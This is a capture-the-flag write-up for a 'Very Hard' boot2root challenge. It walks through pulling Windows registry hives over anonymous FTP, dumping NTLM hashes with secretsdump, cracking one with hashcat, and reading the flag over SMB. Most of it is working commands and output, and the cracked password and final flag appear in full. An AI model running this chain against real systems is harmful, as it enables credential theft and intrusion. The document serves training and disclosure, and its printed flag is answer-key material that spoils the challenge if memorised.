N
Back to writeup archive
LIGA CTF 2026 (Week 2 Boot2Root)

The Art of Evasion & Persistence - I

Windows box exposing FTP and SMB. The path

Boot2RootMarkdown + PDFVery Hardsolved1 minread·293words
route
/TryN3rr0r/writeups/liga-ctf-2026-week-2-boot2root/the-art-of-evasion-and-persistence-i
archive index
11 / 16
read mode
parsed markdown
Writeup loaded.

The Art of Evasion & Persistence - I

challenge brief
target profile, scoring, and execution stack
verified solve
target
192.168.1.22
category
Boot2Root
points
930
difficulty
Very Hard
flag format
OWASPKL{xxx}
tools used
nmappython3ftplibimpacket-secretsdumphashcatsmbclient
final flag
OWASPKL{b955142d1496bc8d6f0d5b16f014666}
reveal and copy from section 5
PDF evidence frame 01

1. Challenge Overview

Windows box exposing FTP and SMB. The path:

Anonymous FTP (active mode) exposes the SAM, SECURITY, SYSTEM registry hives.

Dump NTLM hashes offline on Kali, crack webadmin.

Use the cracked creds over SMB to read webadmin\Desktop\local.txt.

2. Initial Reconnaissance

2.1 Port scan

bash1 lines
1nmap -sC -sV -p- -T4 192.168.1.22 -oA art1_nmap_full
bash4 lines
1PORT      STATE SERVICE       VERSION221/tcp    open  ftp           FileZilla ftpd 1.12.63445/tcp   open  microsoft-ds?48080/tcp  open  http          Apache httpd 2.4.58
PDF evidence frame 02

3. Analysis / Forensics Path

3.1 Enumerate anonymous FTP and find the hives

Anonymous login is allowed. Passive listing hung, so I forced active mode and listed the root — three Windows registry hives are exposed.

bash6 lines
1python3 -c "2from ftplib import FTP3ftp=FTP('192.168.1.22'); print(ftp.getwelcome())4print(ftp.login('anonymous','anonymous@test'))5ftp.set_pasv(False)            # active mode (passive hangs vs this FileZilla)6ftp.retrlines('LIST'); ftp.quit()"
bash5 lines
1220-FileZilla Server 1.12.62230 Login successful.3-r--r--r-- 1 ftp ftp     81920 May 26 13:21 SAM4-r--r--r-- 1 ftp ftp     24576 May 26 13:21 SECURITY5-r--r--r-- 1 ftp ftp  11456512 May 26 13:21 SYSTEM

3.2 Download the hives

The helper (payloads/ftp_active_hive_loot.py) repeats the same anonymous + active-mode session and RETRs the three files into loot/:

python4 lines
1ftp = FTP('192.168.1.22'); ftp.login('anonymous','anonymous@test')2ftp.set_pasv(False)                      # active mode3for fn in ('SAM','SECURITY','SYSTEM'):4    ftp.retrbinary(f'RETR {fn}', open(f'loot/{fn}','wb').write)
bash1 lines
1./payloads/ftp_active_hive_loot.py
bash4 lines
1[*] Connected and switched to active mode2[+] Downloaded SAM      -> loot/SAM      (81920 bytes)3[+] Downloaded SECURITY -> loot/SECURITY (24576 bytes)4[+] Downloaded SYSTEM   -> loot/SYSTEM   (11456512 bytes)

3.3 Dump NTLM hashes offline

bash1 lines
1impacket-secretsdump -sam loot/SAM -security loot/SECURITY -system loot/SYSTEM LOCAL
bash3 lines
1[*] Target system bootKey: 0x9bb8173d4c12219685e7f526ff8e77352Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::3webadmin:1002:aad3b435b51404eeaad3b435b51404ee:97d15e7e19988b89622647e0c2a5f2a1:::
PDF evidence frame 03

4. Exploitation / Recovery

4.1 Crack the webadmin NTLM hash

bash3 lines
1printf '97d15e7e19988b89622647e0c2a5f2a1\n' > loot/webadmin_nt.txt2hashcat -m 1000 -a 0 loot/webadmin_nt.txt /usr/share/wordlists/rockyou.txt3hashcat -m 1000 loot/webadmin_nt.txt --show
bash1 lines
197d15e7e19988b89622647e0c2a5f2a1:webhead2290

4.2 Read the flag over SMB

bash2 lines
1smbclient //192.168.1.22/Users -U 'webadmin%webhead2290' -c 'cd webadmin/Desktop; ls; get local.txt proof/local.txt'2cat proof/local.txt
bash3 lines
1\webadmin\Desktop2  local.txt                           A       42 ...3OWASPKL{b955142d1496bc8d6f0d5b16f014666}

> Re-validated live (full chain) on 2026-05-31 via Kali (192.168.1.10): anonymous active-mode FTP pulled SAM/SECURITY/SYSTEM, secretsdump returned webadmin:...:97d15e7e19988b89622647e0c2a5f2a1, hashcat cracked it to webhead2290, and smbclient //192.168.1.22/Users -U 'webadmin%webhead2290' downloaded webadmin\Desktop\local.txt (42 bytes) -> flag above.

PDF evidence frame 04

5. Flag

captured flag
OWASPKL{b955142d1496bc8d6f0d5b16f014666}

6. Summary of Approach & Key Takeaways

FTP anonymous access exposed backup registry hives.

Active-mode FTP bypassed the passive listing/download hang.

Offline secretsdump recovered the webadmin NTLM hash.

hashcat cracked it to webhead2290.

SMB with the cracked creds read local.txt. No binary executed on target.

Never expose SAM/SECURITY/SYSTEM over anonymous FTP — that is full offline credential disclosure.

When passive FTP hangs against Windows, switch to active mode.

PDF evidence frame 05
PDF evidence frame 06
PDF evidence frame 07
PDF evidence frame 08
PDF evidence frame 09